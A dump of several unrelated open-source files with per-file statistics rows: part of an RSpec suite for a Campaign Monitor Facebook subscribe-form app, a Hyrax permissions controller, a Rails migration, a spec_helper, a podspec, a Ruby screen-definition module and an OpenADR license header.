expect(last_response.content_type).to eq("application/json;charset=utf-8")
expect(last_response.body).to eq(%Q[[{"ListID":"listid","Name":"list name"}]])
end
end
context "when a call to the Campaign Monitor API fails" do
before do
stub_request(:get, "https://testapikey:[email protected]/api/v3/clients/#{client_id}/lists.json").
to_return(
:status => 500,
:body => %Q[[{"Code": 500,"Message":"Sorry."}]],
:headers => { "Content-Type" => "application/json;charset=utf-8" })
end
it "gets an empty list" do
get "/lists/#{cm_api_key}/#{client_id}"
expect(last_response.status).to eq(200)
expect(last_response.content_type).to eq("application/json;charset=utf-8")
expect(last_response.body).to eq("[]")
end
end
end
describe "GET /customfields/:api_key/:list_id" do
let(:list_id) { "323231223" }
context "when a call to the Campaign Monitor API succeeds" do
before do
stub_request(:get, "https://testapikey:[email protected]/api/v3/lists/#{list_id}/customfields.json").
to_return(
:status => 200,
:body => %Q[[{"FieldName":"website","Key":"[website]","DataType":"Text","FieldOptions":[],"VisibleInPreferenceCenter":true}]],
:headers => { "Content-Type" => "application/json;charset=utf-8" })
end
it "gets the custom fields for the list" do
get "/customfields/#{cm_api_key}/#{list_id}"
expect(last_response.status).to eq(200)
expect(last_response.content_type).to eq("application/json;charset=utf-8")
expect(last_response.body).to eq(%Q[[{"FieldName":"website","Key":"[website]","DataType":"Text","FieldOptions":[],"VisibleInPreferenceCenter":true}]])
end
end
context "when a call to the Campaign Monitor API fails" do
before do
stub_request(:get, "https://testapikey:[email protected]/api/v3/lists/#{list_id}/customfields.json").
to_return(
:status => 500,
:body => %Q[[{"Code": 500,"Message":"Sorry."}]],
:headers => { "Content-Type" => "application/json;charset=utf-8" })
end
it "gets an empty list" do
get "/customfields/#{cm_api_key}/#{list_id}"
expect(last_response.status).to eq(200)
expect(last_response.content_type).to eq("application/json;charset=utf-8")
expect(last_response.body).to eq("[]")
end
end
end
describe "POST /page/:page_id" do
context "when saving a new subscribe form for a page" do
let(:page_id) { "7687687687" }
let(:page_name) { "test page" }
let(:client_id) { "testclientid" }
let(:list_id) { "testlistid" }
let(:account) {
Account.create(:api_key => cm_api_key, :user_id => user_id)
}
let(:intro_message) { "Intro message!" }
let(:thanks_message) { "Thanks!" }
let(:include_name) { true }
before do
account.save
stub_request(:get, "https://graph.facebook.com/v2.2/me?access_token=xxxx").
to_return(:status => 200, :body => %Q[{"id":"#{user_id}"}])
stub_request(:get, "https://graph.facebook.com/v2.2/7687687687?access_token=xxxx").
to_return(:status => 200, :body => %Q[{"id":"#{page_id}","name":"#{page_name}","has_added_app":true,"link":"https://www.facebook.com/pages/my-page/#{page_id}"}])
stub_request(:get, "https://testapikey:[email protected]/api/v3/lists/#{list_id}/customfields.json").
to_return(
:status => 200,
:body => %Q[[{"FieldName":"website","Key":"[website]","DataType":"Text","FieldOptions":[],"VisibleInPreferenceCenter":true}]],
:headers => { "Content-Type" => "application/json;charset=utf-8" })
end
it "saves the form and returns a json payload containing the success message" do
post "/page/#{page_id}",
{ "facebook" => { "user_id" => user_id },
"api_key" => cm_api_key, "list_id" => list_id, "client_id" => client_id,
"intro_message" => intro_message, "thanks_message" => thanks_message,
"include_name" => include_name
},
{ "rack.session" => { "fb_auth" => { "uid" => user_id }, "fb_token" => fb_token } }
form = account.forms.first(:page_id => page_id)
expect(form.intro_message).to eq(intro_message)
expect(form.thanks_message).to eq(thanks_message)
expect(form.include_name).to eq(include_name)
expect(last_response.status).to eq(200)
expect(last_response.content_type).to eq("application/json;charset=utf-8")
expect(last_response.body).to eq(%Q[{"status":"success","message":"Thanks, you successfully saved your subscribe form for #{page_name}."}])
end
end
context "when saving an existing subscribe form for a page" do
let(:page_id) { "7687687687" }
let(:page_name) { "test page" }
let(:client_id) { "testclientid" }
let(:list_id) { "testlistid" }
let(:account) {
Account.create(:api_key => cm_api_key, :user_id => user_id)
}
let(:form) {
Form.create(
:account => account, :page_id => page_id, :client_id => client_id,
:list_id => list_id, :intro_message => "Intro message!",
:thanks_message => "Thanks!", :include_name => true)
}
let(:intro_message) { "New intro message!" }
let(:thanks_message) { "Thank you." }
let(:include_name) { false }
before do
account.save
form.save
stub_request(:get, "https://graph.facebook.com/v2.2/me?access_token=xxxx").
to_return(:status => 200, :body => %Q[{"id":"#{user_id}"}])
stub_request(:get, "https://graph.facebook.com/v2.2/7687687687?access_token=xxxx").
to_return(:status => 200, :body => %Q[{"id":"#{page_id}","name":"#{page_name}","has_added_app":true,"link":"https://www.facebook.com/pages/my-page/#{page_id}"}])
stub_request(:get, "https://testapikey:[email protected]/api/v3/lists/#{list_id}/customfields.json").
to_return(
:status => 200,
:body => %Q[[{"FieldName":"multiselect","Key":"[multiselect]","DataType":"MultiSelectMany","FieldOptions":["one","two","three"],"VisibleInPreferenceCenter":true}]],
:headers => { "Content-Type" => "application/json;charset=utf-8" })
end
it "saves the form and returns a json payload containing the success message" do
post "/page/#{page_id}",
{ "facebook" => { "user_id" => user_id },
"api_key" => cm_api_key, "list_id" => list_id, "client_id" => client_id,
"intro_message" => intro_message, "thanks_message" => thanks_message,
"include_name" => include_name, "cf-multiselect" => "checked"
},
{ "rack.session" => { "fb_auth" => { "uid" => user_id }, "fb_token" => fb_token } }
form = account.forms.first(:page_id => page_id)
fields = form.custom_fields
expect(form.intro_message).to eq(intro_message)
expect(form.thanks_message).to eq(thanks_message)
expect(form.include_name).to eq(include_name)
expect(fields.first.name).to eq("multiselect")
expect(fields.first.field_key).to eq("[multiselect]")
expect(fields.first.data_type).to eq("MultiSelectMany")
expect(fields.first.field_options).to eq("one^two^three")
expect(last_response.status).to eq(200)
expect(last_response.content_type).to eq("application/json;charset=utf-8")
expect(last_response.body).to eq(%Q[{"status":"success","message":"Thanks, you successfully saved your subscribe form for #{page_name}."}])
end
end
end
describe "GET /tab" do
context "when a page hasn't had a subscribe form set up" do
it "shows that the page hasn't had a subscribe form set up yet" do
get "/tab"
expect(last_response.status).to eq(200)
expect(last_response.body).to \
include("This page hasn't had a subscribe form set up yet")
end
end
context "when a page has had a subscribe form set up" do
let(:page_id) { "7687687687" }
let(:client_id) { "testclientid" }
let(:list_id) { "testlistid" }
let(:account) {
Account.create(:api_key => cm_api_key, :user_id => user_id)
}
let(:form) {
Form.create(
:account => account, :page_id => page_id, :client_id => client_id,
:list_id => list_id, :intro_message => "Intro message!",
:thanks_message => "Thanks!", :include_name => true)
}
before do
account.save
form.save
end
it "shows the saved subscribe form" do
get "/tab",
{ "facebook" => { "user_id" => user_id, "page" => { "id" => page_id } } }
expect(last_response.status).to eq(200)
expect(last_response.body).to include(form.intro_message)
end
end
end
describe "POST /subscribe/:page_id" do
context "when someone subscribes successfully" do
let(:page_id) { "7687687687" }
let(:client_id) { "testclientid" }
let(:list_id) { "testlistid" }
let(:account) {
Account.create(:api_key => cm_api_key, :user_id => user_id)
}
let(:form) {
Form.create(
:account => account, :page_id => page_id, :client_id => client_id,
:list_id => list_id, :intro_message => "Intro message!",
:thanks_message => "Thanks!", :include_name => true)
}
before do
account.save
form.save
stub_request(:post, "https://testapikey:[email protected]/api/v3/subscribers/testlistid.json").
with(
:body => %Q[{"EmailAddress":"[email protected]","Name":"test subscriber","CustomFields":[{"Key":"[website]","Value":"https://example.com/"},{"Key":"[multiselect]","Value":"one"},{"Key":"[multiselect]","Value":"three"}],"Resubscribe":true,"RestartSubscriptionBasedAutoresponders":false}],
:headers => { "Content-Type" => "application/json; charset=utf-8" }).
to_return(:status => 200, :body => "[email protected]")
end
it "returns a json payload containing the success message" do
post "/subscribe/#{page_id}", {
"facebook" => { "user_id" => user_id, "page" => { "id" => page_id } },
"name" => "test subscriber",
"email" => "[email protected]",
"cf-website" => "https://example.com/",
"cf-multiselect" => [ "one", "three" ]
}
expect(last_response.status).to eq(200)
expect(last_response.content_type).to eq("application/json;charset=utf-8")
expect(last_response.body).to \
eq(%Q[{"status":"success","message":"#{form.thanks_message}"}])
end
end
context "when subscribing fails" do
let(:page_id) { "7687687687" }
let(:client_id) { "testclientid" }
let(:list_id) { "testlistid" }
let(:account) {
Account.create(:api_key => cm_api_key, :user_id => user_id)
}
let(:form) {
Form.create(
:account => account, :page_id => page_id, :client_id => client_id,
:list_id => list_id, :intro_message => "Intro message!",
:thanks_message => "Thanks!", :include_name => true)
}
before do
account.save
form.save
stub_request(:post, "https://testapikey:[email protected]/api/v3/subscribers/testlistid.json").
with(
:body => %Q[{"EmailAddress":"not an email address","Name":"test subscriber","CustomFields":[{"Key":"[website]","Value":"https://example.com/"}],"Resubscribe":true,"RestartSubscriptionBasedAutoresponders":false}],
:headers => { "Content-Type" => "application/json; charset=utf-8" }).
to_return(:status => 400,
:headers => { "Content-Type" => "application/json; charset=utf-8" },
:body => %Q[{ "Code": 1, "Message": "Invalid email address" }])
end
it "returns a json payload containing the error details" do
post "/subscribe/#{page_id}", {
"facebook" => { "user_id" => user_id, "page" => { "id" => page_id } },
"name" => "test subscriber",
"email" => "not an email address",
"cf-website" => "https://example.com/"
}
expect(last_response.status).to eq(200)
expect(last_response.content_type).to eq("application/json;charset=utf-8")
expect(last_response.body).to \
eq(%Q[{"status":"error","message":"Sorry, there was a problem subscribing you to our list. Please try again."}])
end
end
end
describe "GET /ondeauth" do
it "deletes any accounts associated with the fb user and responds with 200 OK" do
get "/ondeauth", { "facebook" => { "user_id" => user_id } }
accounts = Account.all(:user_id => user_id)
expect(accounts).to eq([])
expect(last_response.status).to eq(200)
end
end
describe "GET /auth/failure" do
it "clears the session and redirects to /" do
get "/auth/failure"
expect(last_request.env["rack.session"]["fb_auth"]).to be_nil
expect(last_request.env["rack.session"]["fb_token"]).to be_nil
expect(last_response.status).to eq(302)
expect(last_response.location).to eq("http://example.org/")
end
end
describe "GET /logout" do
it "clears the session and redirects to /" do
get "/logout"
expect(last_request.env["rack.session"]["fb_auth"]).to be_nil
expect(last_request.env["rack.session"]["fb_token"]).to be_nil
expect(last_response.status).to eq(302)
expect(last_response.location).to eq("http://example.org/")
end
end
describe "GET /privacy" do
it "shows the privacy page" do
get "/privacy"
expect(last_response.status).to eq(200)
expect(last_response.body).to \
include("The Campaign Monitor Subscribe Form app respect's the privacy of people who use it")
end
end
describe "GET /nothingtoseehere" do
it "shows the app's 404 Not Found page" do
get "/nothingtoseehere"
expect(last_response.status).to eq(404)
expect(last_response.body).to \
include("We don't recognise that as part of Campaign Monitor Subscribe Form - sorry!")
end
end
describe "GET /boom" do
it "shows the app's 500 Server Error page" do
expect do
get "/boom"
expect(last_response.status).to eq(500)
expect(last_response.body).to \
include("We're really sorry that there's something wrong with Campaign Monitor Subscribe Form")
end.to raise_error
end
end
describe "GET /reset.css" do
it "serves the reset.css stylesheet" do
get "/reset.css"
expect(last_response.status).to eq(200)
expect(last_response.content_type).to eq("text/css;charset=utf-8")
end
end
describe "GET /cm.css" do
it "serves the cm.css stylesheet" do
get "/cm.css"
expect(last_response.status).to eq(200)
expect(last_response.content_type).to eq("text/css;charset=utf-8")
end
end
describe "GET /fb.css" do
it "serves the fb.css stylesheet" do
get "/fb.css"
expect(last_response.status).to eq(200)
expect(last_response.content_type).to eq("text/css;charset=utf-8")
end
end
end
| 39.945985 | 298 | 0.595585 |
ed85b7e1a615f7387f3c51ade8289efe17526ae5 | 1,259 | # frozen_string_literal: true
module Hyrax
class PermissionsController < ApplicationController
helper_method :curation_concern
def confirm
# intentional noop to display default view
end
deprecation_deprecate confirm: "Use the #confirm_access action instead."
def copy
authorize! :edit, curation_concern
VisibilityCopyJob.perform_later(curation_concern)
flash_message = 'Updating file permissions. This may take a few minutes. You may want to refresh your browser or return to this record later to see the updated file permissions.'
redirect_to [main_app, curation_concern], notice: flash_message
end
def confirm_access
# intentional noop to display default view
end
def copy_access
authorize! :edit, curation_concern
# copy visibility
VisibilityCopyJob.perform_later(curation_concern)
# copy permissions
InheritPermissionsJob.perform_later(curation_concern)
redirect_to [main_app, curation_concern], notice: I18n.t("hyrax.upload.change_access_flash_message")
end
def curation_concern
@curation_concern ||= Hyrax.query_service.find_by_alternate_identifier(alternate_identifier: params[:id], use_valkyrie: false)
end
end
end
| 34.027027 | 184 | 0.752979 |
b9cade92151af813a70f332b6052bb3a49c8af4b | 487 | class DropUnusedDatabaseColumns < ActiveRecord::Migration
def self.up
remove_column :ownerships, :approved
remove_column :versions, :downloads_count
drop_table :downloads
end
def self.down
create_table "downloads" do |t|
t.integer "version_id"
t.datetime "created_at"
t.datetime "updated_at"
end
add_column :versions, :downloads_count, :integer, :default => 0
add_column :ownerships, :approved, :boolean, :default => false
end
end
| 27.055556 | 67 | 0.706366 |
ace84c90f48ad0cf37a83359b40d57624591db1d | 44 | require 'resque'
require 'resque/scheduler'
| 14.666667 | 26 | 0.795455 |
334c49fe4c7977889814ca137a09a663edf882fe | 4,296 | require File.expand_path("../../lib/s3-wrapper", __FILE__)
require 'spec_prepare'
# This file was generated by the `rspec --init` command. Conventionally, all
# specs live under a `spec` directory, which RSpec adds to the `$LOAD_PATH`.
# The generated `.rspec` file contains `--require spec_helper` which will cause this
# file to always be loaded, without a need to explicitly require it in any files.
#
# Given that it is always loaded, you are encouraged to keep this file as
# light-weight as possible. Requiring heavyweight dependencies from this file
# will add to the boot time of your test suite on EVERY test run, even for an
# individual file that may not need all of that loaded. Instead, consider making
# a separate helper file that requires the additional dependencies and performs
# the additional setup, and require it from the spec files that actually need it.
#
# The `.rspec` file also contains a few flags that are not defaults but that
# users commonly want.
#
# See http://rubydoc.info/gems/rspec-core/RSpec/Core/Configuration
RSpec.configure do |config|
# rspec-expectations config goes here. You can use an alternate
# assertion/expectation library such as wrong or the stdlib/minitest
# assertions if you prefer.
config.expect_with :rspec do |expectations|
# This option will default to `true` in RSpec 4. It makes the `description`
# and `failure_message` of custom matchers include text for helper methods
# defined using `chain`, e.g.:
# be_bigger_than(2).and_smaller_than(4).description
# # => "be bigger than 2 and smaller than 4"
# ...rather than:
# # => "be bigger than 2"
expectations.include_chain_clauses_in_custom_matcher_descriptions = true
end
# rspec-mocks config goes here. You can use an alternate test double
# library (such as bogus or mocha) by changing the `mock_with` option here.
config.mock_with :rspec do |mocks|
# Prevents you from mocking or stubbing a method that does not exist on
# a real object. This is generally recommended, and will default to
# `true` in RSpec 4.
mocks.verify_partial_doubles = true
end
# The settings below are suggested to provide a good initial experience
# with RSpec, but feel free to customize to your heart's content.
# These two settings work together to allow you to limit a spec run
# to individual examples or groups you care about by tagging them with
# `:focus` metadata. When nothing is tagged with `:focus`, all examples
# get run.
config.filter_run :focus
config.run_all_when_everything_filtered = true
# Limits the available syntax to the non-monkey patched syntax that is recommended.
# For more details, see:
# - http://myronmars.to/n/dev-blog/2012/06/rspecs-new-expectation-syntax
# - http://teaisaweso.me/blog/2013/05/27/rspecs-new-message-expectation-syntax/
# - http://myronmars.to/n/dev-blog/2014/05/notable-changes-in-rspec-3#new__config_option_to_disable_rspeccore_monkey_patching
config.disable_monkey_patching!
# This setting enables warnings. It's recommended, but in some cases may
# be too noisy due to issues in dependencies.
config.warnings = true
# Many RSpec users commonly either run the entire suite or an individual
# file, and it's useful to allow more verbose output when running an
# individual spec file.
if config.files_to_run.one?
# Use the documentation formatter for detailed output,
# unless a formatter has already been configured
# (e.g. via a command-line flag).
config.default_formatter = 'doc'
end
# Print the 10 slowest examples and example groups at the
# end of the spec run, to help surface which specs are running
# particularly slow.
config.profile_examples = 10
# Run specs in random order to surface order dependencies. If you find an
# order dependency and want to debug it, you can fix the order by providing
# the seed, which is printed after each run.
# --seed 1234
config.order = :random
# Seed global randomization in this process using the `--seed` CLI option.
# Setting this allows you to use `--seed` to deterministically reproduce
# test failures related to randomization by passing the same `--seed` value
# as the one that triggered the failure.
Kernel.srand config.seed
end
| 47.208791 | 129 | 0.744646 |
ac4db34519aa107a25519823a057cb2899a26160 | 849 | Pod::Spec.new do |s|
s.name = "StreamingKit"
s.version = "0.1.21"
s.summary = "A fast and extensible audio streamer for iOS and OSX with support for gapless playback and custom (non-HTTP) sources."
s.homepage = "https://github.com/tumtumtum/StreamingKit/"
s.license = 'MIT'
s.author = { "Thong Nguyen" => "[email protected]" }
s.source = { :git => "https://github.com/tumtumtum/StreamingKit.git", :tag => s.version.to_s}
s.platform = :ios
s.requires_arc = true
s.source_files = 'StreamingKit/StreamingKit/*.{h,m}'
s.ios.deployment_target = '4.3'
s.ios.frameworks = 'SystemConfiguration', 'CFNetwork', 'CoreFoundation', 'AudioToolbox'
s.osx.deployment_target = '10.7'
s.osx.frameworks = 'SystemConfiguration', 'CFNetwork', 'CoreFoundation', 'AudioToolbox', 'AudioUnit'
end
| 49.941176 | 138 | 0.660777 |
e25a7cc04f87cbf3ab6855d3bdd4a4d4ea2b1d08 | 2,264 | require 'yaml'
require 'oj'
require 'pry'
require_relative 'screen/group'
require_relative 'screen/definition'
module Hippo
module Screen
GROUPS=Hash.new{|h,k| g=Group.new; g.identifier=k; h[k]=g }
DEFINITIONS = Hash.new
EXTENSIONS = Hash.new
mattr_accessor :enabled_group_ids
class DefinitionList
attr_reader :ids
include Enumerable
def initialize(extension_id)
@ids = []
@extension_id = extension_id
end
def define(id)
ids.push(id)
definition = (DEFINITIONS[id] ||= Definition.new(id, @extension_id))
yield definition
end
def extend(id)
ids.push(id)
definition = DEFINITIONS[id]
definition.extension_id = @extension_id
yield definition if block_given?
end
def each
ids.each { |id| yield DEFINITIONS[id] }
end
end
class << self
include Enumerable
def [](config)
if DEFINITIONS.key?(config)
DEFINITIONS[config]
else
nil
end
end
def each
DEFINITIONS.values.each { |s| yield s }
end
def for_extension(id)
definition = EXTENSIONS[id] ||= DefinitionList.new(id)
yield definition if block_given?
definition
end
def define_group(id)
group = GROUPS[id]
yield group
end
def ids_for_user(user)
Extensions.load_screens
for_extension(Hippo::Extensions.controlling.identifier).select{|s|
s.viewable_by?(user)
}.map(&:identifier)
end
def each_group
Extensions.load_screens
GROUPS.values.each{ | group | yield group }
end
def config_file
Hippo::Extensions.controlling.root_path.join("config", "screens.rb")
end
end
end
end
| 24.344086 | 84 | 0.487633 |
4ab673cdb06d552afa6483313f58321ea5df7eba | 15,601 | #@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
#
# Copyright (c) 2016, Electric Power Research Institute (EPRI)
# All rights reserved.
#
# OpenADR ("this software") is licensed under BSD 3-Clause license.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of EPRI nor the names of its contributors may
# be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
# NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY
# OF SUCH DAMAGE.
#
# This EPRI software incorporates work covered by the following copyright and permission
# notices. You may not use these works except in compliance with their respective
# licenses, which are provided below.
#
# These works are provided by the copyright holders and contributors "as is" and any express or
# implied warranties, including, but not limited to, the implied warranties of merchantability
# and fitness for a particular purpose are disclaimed.
#
#########################################################################################
# MIT Licensed Libraries
#########################################################################################
#
# * actionmailer 3.2.12 (http://www.rubyonrails.org) - Email composition, delivery, and receiving framework (part of Rails).
# * actionpack 3.2.12 (http://www.rubyonrails.org) - Web-flow and rendering framework putting the VC in MVC (part of Rails).
# * activemodel 3.2.12 (http://www.rubyonrails.org) - A toolkit for building modeling frameworks (part of Rails).
# * activerecord 3.2.12 (http://www.rubyonrails.org) - Object-relational mapper framework (part of Rails).
# * activeresource 3.2.12 (http://www.rubyonrails.org) - REST modeling framework (part of Rails).
# * activesupport 3.2.12 (http://www.rubyonrails.org) - A toolkit of support libraries and Ruby core extensions extracted from the Rails framework.
# * arel 3.0.2 (http://github.com/rails/arel) - Arel is a SQL AST manager for Ruby
# * bootstrap-sass 3.1.1.0 (https://github.com/twbs/bootstrap-sass) - Twitter's Bootstrap, converted to Sass and ready to drop into Rails or Compass
# * builder 3.0.4 (http://onestepback.org) - Builders for MarkUp.
# * bundler 1.12.5 (http://bundler.io) - The best way to manage your application's dependencies
# * capybara 2.4.4 (http://github.com/jnicklas/capybara) - Capybara aims to simplify the process of integration testing Rack applications, such as Rails, Sinatra or Merb
# * coffee-rails 3.2.2 () - Coffee Script adapter for the Rails asset pipeline.
# * coffee-script-source 1.6.3 (http://jashkenas.github.com/coffee-script/) - The CoffeeScript Compiler
# * docile 1.1.5 (https://ms-ati.github.io/docile/) - Docile keeps your Ruby DSLs tame and well-behaved
# * edn 1.0.0 () - 'edn implements a reader for Extensible Data Notation by Rich Hickey.'
# * erubis 2.7.0 (http://www.kuwata-lab.com/erubis/) - a fast and extensible eRuby implementation which supports multi-language
# * execjs 1.4.0 (https://github.com/sstephenson/execjs) - Run JavaScript code from Ruby
# * factory_girl 4.5.0 (https://github.com/thoughtbot/factory_girl) - factory_girl provides a framework and DSL for defining and using model instance factories.
# * factory_girl_rails 4.5.0 (http://github.com/thoughtbot/factory_girl_rails) - factory_girl_rails provides integration between factory_girl and rails 3
# * gem-licenses 0.1.2 (http://github.com/dblock/gem-licenses) - List all gem licenses.
# * hike 1.2.3 (http://github.com/sstephenson/hike) - Find files in a set of paths
# * i18n 0.6.5 (http://github.com/svenfuchs/i18n) - New wave Internationalization support for Ruby
# * jdbc-postgresql 9.2.1000 (https://github.com/rosenfeld/jdbc-postgresql) - PostgresSQL jdbc driver for JRuby
# * journey 1.0.4 (http://github.com/rails/journey) - Journey is a router
# * jquery-rails 3.0.4 (http://rubygems.org/gems/jquery-rails) - Use jQuery with Rails 3
# * json-schema 2.6.2 (http://github.com/ruby-json-schema/json-schema/tree/master) - Ruby JSON Schema Validator
# * mail 2.4.4 (http://github.com/mikel/mail) - Mail provides a nice Ruby DSL for making, sending and reading emails.
# * metaclass 0.0.4 (http://github.com/floehopper/metaclass) - Adds a metaclass method to all Ruby objects
# * mime-types 1.23 (http://mime-types.rubyforge.org/) - This library allows for the identification of a file's likely MIME content type
# * mocha 1.1.0 (http://gofreerange.com/mocha/docs) - Mocking and stubbing library
# * multi_json 1.7.9 (http://github.com/intridea/multi_json) - A common interface to multiple JSON libraries.
# * nokogiri 1.6.5 (http://nokogiri.org) - Nokogiri (鋸) is an HTML, XML, SAX, and Reader parser
# * polyglot 0.3.3 (http://github.com/cjheath/polyglot) - Augment 'require' to load non-Ruby file types
# * rack-test 0.6.2 (http://github.com/brynary/rack-test) - Simple testing API built on Rack
# * railties 3.2.12 (http://www.rubyonrails.org) - Tools for creating, working with, and running Rails applications.
# * rake 10.1.0 (http://rake.rubyforge.org) - Ruby based make-like utility.
# * rspec-core 2.14.3 (http://github.com/rspec/rspec-core) - rspec-core-2.14.3
# * rspec-expectations 2.14.0 (http://github.com/rspec/rspec-expectations) - rspec-expectations-2.14.0
# * rspec-mocks 2.14.1 (http://github.com/rspec/rspec-mocks) - rspec-mocks-2.14.1
# * rspec-rails 2.14.0 (http://github.com/rspec/rspec-rails) - rspec-rails-2.14.0
# * sass 3.2.9 (http://sass-lang.com/) - A powerful but elegant CSS compiler that makes CSS fun again.
# * sass-rails 3.2.6 () - Sass adapter for the Rails asset pipeline.
# * simplecov 0.9.0 (http://github.com/colszowka/simplecov) - Code coverage for Ruby 1.9+ with a powerful configuration library and automatic merging of coverage across test suites
# * spork 1.0.0rc3 (http://github.com/sporkrb/spork) - spork
# * therubyrhino 2.0.2 (http://github.com/cowboyd/therubyrhino) - Embed the Rhino JavaScript interpreter into JRuby
# * thor 0.18.1 (http://whatisthor.com/) - A scripting framework that replaces rake, sake and rubigen
# * tilt 1.4.1 (http://github.com/rtomayko/tilt/) - Generic interface to multiple Ruby template engines
# * treetop 1.4.14 (https://github.com/cjheath/treetop) - A Ruby-based text parsing and interpretation DSL
# * uglifier 2.1.2 (http://github.com/lautis/uglifier) - Ruby wrapper for UglifyJS JavaScript compressor
# * xpath 2.0.0 (http://github.com/jnicklas/xpath) - Generate XPath expressions from Ruby
# * blankslate 2.1.2.4 (http://github.com/masover/blankslate) - BlankSlate extracted from Builder.
# * bourbon 3.1.8 (https://github.com/thoughtbot/bourbon) - Bourbon Sass Mixins using SCSS syntax.
# * coffee-script 2.2.0 (http://github.com/josh/ruby-coffee-script) - Ruby CoffeeScript Compiler
# * diff-lcs 1.2.4 (http://diff-lcs.rubyforge.org/) - Diff::LCS computes the difference between two Enumerable sequences using the McIlroy-Hunt longest common subsequence (LCS) algorithm
# * jquery-ui-rails 4.0.3 (https://github.com/joliss/jquery-ui-rails) - jQuery UI packaged for the Rails asset pipeline
# * parslet 1.4.0 (http://kschiess.github.com/parslet) - Parser construction library with great error reporting in Ruby.
# * rack 1.4.5 (http://rack.github.com/) - a modular Ruby webserver interface
# * rack-cache 1.2 (http://tomayko.com/src/rack-cache/) - HTTP Caching for Rack
# * rack-ssl 1.3.3 (https://github.com/josh/rack-ssl) - Force SSL/TLS in your app.
# * rails 3.2.12 (http://www.rubyonrails.org) - Full-stack web application framework.
# * simplecov-html 0.8.0 (https://github.com/colszowka/simplecov-html) - Default HTML formatter for SimpleCov code coverage tool for ruby 1.9+
# * tzinfo 0.3.37 (http://tzinfo.rubyforge.org/) - Daylight-savings aware timezone library
# * warbler 1.4.0.beta1 (http://caldersphere.rubyforge.org/warbler) - Warbler chirpily constructs .war files of your Rails applications.
#
#########################################################################################
# BSD Licensed Libraries
#########################################################################################
#
# * activerecord-jdbc-adapter 1.2.9.1 (https://github.com/jruby/activerecord-jdbc-adapter) - Copyright (c) 2006-2012 Nick Sieger <[email protected]>, Copyright (c) 2006-2008 Ola Bini <[email protected]>
# * jdbc-postgres 9.2.1004 (https://github.com/jruby/activerecord-jdbc-adapter) - Copyright (c) 1997-2011, PostgreSQL Global Development Group
# * d3js 3.5.16 (https://d3js.org/) Copyright (c) 2015 Mike Bostock
#
#########################################################################################
# Ruby Licensed Libraries
#########################################################################################
#
# * json 1.8.0 (http://json-jruby.rubyforge.org/) - JSON implementation for JRuby
# * rubyzip 0.9.9 (http://github.com/aussiegeek/rubyzip) - rubyzip is a ruby module for reading and writing zip files
# * httpclient 2.3.4.1 (http://github.com/nahi/httpclient) - gives something like the functionality of libwww-perl (LWP) in Ruby
# * test-unit 2.5.5 (http://test-unit.rubyforge.org/) - test-unit - Improved version of Test::Unit bundled in Ruby 1.8.x.
#
#########################################################################################
# Public domain - creative commons Licensed Libraries
#########################################################################################
#
# * torquebox 3.1.2 (http://torquebox.org/) - TorqueBox Gem
# * torquebox-cache 3.1.2 (http://torquebox.org/) - TorqueBox Cache Gem
# * torquebox-configure 3.1.2 (http://torquebox.org/) - TorqueBox Configure Gem
# * torquebox-core 3.1.2 (http://torquebox.org/) - TorqueBox Core Gem
# * torquebox-messaging 3.1.2 (http://torquebox.org/) - TorqueBox Messaging Client
# * torquebox-naming 3.1.2 (http://torquebox.org/) - TorqueBox Naming Client
# * torquebox-rake-support 3.1.2 (http://torquebox.org/) - TorqueBox Rake Support
# * torquebox-security 3.1.2 (http://torquebox.org/) - TorqueBox Security Gem
# * torquebox-server 3.1.2 (http://torquebox.org/) - TorqueBox Server Gem
# * torquebox-stomp 3.1.2 (http://torquebox.org/) - TorqueBox STOMP Support
# * torquebox-transactions 3.1.2 (http://torquebox.org/) - TorqueBox Transactions Gem
# * torquebox-web 3.1.2 (http://torquebox.org/) - TorqueBox Web Gem
#
#########################################################################################
# Apache Licensed Libraries
#########################################################################################
#
# * addressable 2.3.8 (https://github.com/sporkmonger/addressable) - URI Implementation
# * bcrypt-ruby 3.0.1 (http://bcrypt-ruby.rubyforge.org) - OpenBSD's bcrypt() password hashing algorithm.
# * database_cleaner 1.4.0 (http://github.com/bmabey/database_cleaner) - Strategies for cleaning databases. Can be used to ensure a clean state for testing.
# * annotate 2.5.0 (http://github.com/ctran/annotate_models) - Annotates Rails Models, routes, fixtures, and others based on the database schema.
# * nvd3 1.8.4 (http://nvd3.org/) Copeyright (c) 2014 Novus Partners - chart library based on d3js
# * smack 3.3.1 (https://www.igniterealtime.org/projects/smack/) - XMPP library
#
#########################################################################################
# LGPL
#########################################################################################
#
# * jruby-1.7.4
# * jruby-jars 1.7.4 (http://github.com/jruby/jruby/tree/master/gem/jruby-jars) - The core JRuby code and the JRuby stdlib as jar
# ** JRuby is tri-licensed GPL, LGPL, and EPL.
#
#########################################################################################
# MPL Licensed Libraries
#########################################################################################
#
# * therubyrhino_jar 1.7.4 (http://github.com/cowboyd/therubyrhino) - Rhino's jars packed for therubyrhino
#
#########################################################################################
# Artistic 2.0
# * mime-types 1.23 (http://mime-types.rubyforge.org/) - This library allows for the identification of a file's likely MIME content type
#
#########################################################################################
#
#########################################################################################
# GPL-2
#########################################################################################
